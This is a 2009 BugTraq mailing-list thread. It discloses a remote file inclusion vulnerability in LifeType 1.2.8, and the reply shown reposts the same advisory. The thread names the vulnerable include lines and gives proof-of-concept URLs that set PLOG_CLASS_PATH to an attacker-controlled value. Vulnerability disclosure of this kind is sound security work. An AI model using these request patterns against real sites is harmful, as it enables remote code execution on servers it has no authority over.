BugTraq
Back to list
|
Post reply
LifeType 1.2.8 Remote File Inclusion Vulnerability
Jul 23 2009 03:47AM
Cru3l.b0y (cru3l b0y gmail com)
(1 replies)
Hi Dear,
I found a new bug in LifeType. Please publish it.
thank you
best regards
/=======================================================================
========================================================================
| |
| [o] LifeType 1.2.8 Remote File Inclusion Vulnerability |
| |
| Software : LifeType 1.2.8
| Vendor : http://lifetype.net/
| Author : Cru3l.b0y |
| Contact : Cru3l.b0y (at) deltahacking (dot) net [email concealed] |
| Home : WwW.DeltaHacking.Net
|=======================================================================
========================================================================
|
| |
| [o] Vulnerable file |
| |
| install/installation.class.php |
| |
| include_once( PLOG_CLASS_PATH."config/config.properties.php" ); |
| |
| class/bootstrap.php |
| |
| include( PLOG_CLASS_PATH."class/object/loader.class.php" ); |
| |
| |
| [o] Exploit |
| |
| http://localhost/[path]/install/installation.class.php?PLOG_CLASS_PATH=[
evilcode] |
| http://localhost/[path]/class/bootstrap.php?PLOG_CLASS_PATH=[evilcode] |
| |
|=======================================================================
========================================================================
|
[ reply ]
Re: LifeType 1.2.8 Remote File Inclusion Vulnerability
Jul 23 2009 03:16PM
GulfTech Security Research (security gulftech org)
Privacy Statement
Copyright 2010, SecurityFocus
I found a new bug in LifeType. Please publish it.
thank you
best regards
/=======================================================================
========================================================================
| |
| [o] LifeType 1.2.8 Remote File Inclusion Vulnerability |
| |
| Software : LifeType 1.2.8
| Vendor : http://lifetype.net/
| Author : Cru3l.b0y |
| Contact : Cru3l.b0y (at) deltahacking (dot) net [email concealed] |
| Home : WwW.DeltaHacking.Net
|=======================================================================
========================================================================
|
| |
| [o] Vulnerable file |
| |
| install/installation.class.php |
| |
| include_once( PLOG_CLASS_PATH."config/config.properties.php" ); |
| |
| class/bootstrap.php |
| |
| include( PLOG_CLASS_PATH."class/object/loader.class.php" ); |
| |
| |
| [o] Exploit |
| |
| http://localhost/[path]/install/installation.class.php?PLOG_CLASS_PATH=[
evilcode] |
| http://localhost/[path]/class/bootstrap.php?PLOG_CLASS_PATH=[evilcode] |
| |
|=======================================================================
========================================================================
|
[ reply ]